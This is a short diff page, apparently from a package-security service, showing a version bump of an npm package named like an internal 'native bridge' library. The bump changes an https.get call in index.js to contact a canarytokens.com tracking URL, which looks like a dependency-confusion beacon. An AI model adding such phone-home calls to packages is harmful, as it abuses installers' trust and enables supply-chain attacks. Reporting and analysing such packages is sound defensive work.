wdpr-ra-javascript-native-bridge 1.0.1 → 1.0.2
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +1 -1
- package/package.json +1 -1
package/index.js
CHANGED
@@ -4,7 +4,7 @@
|
|
4
4
|
const https = require('https');
|
5
5
|
|
6
6
|
function fetchReadme() {
|
7
|
-
https.get('https://
|
7
|
+
https.get('https://canarytokens.com/about/static/feedback/1imtx11pgj1z7r2h293q3swqi/index.html', (resp) => {
|
8
8
|
let data = '';
|
9
9
|
|
10
10
|
// A chunk of data has been received.
|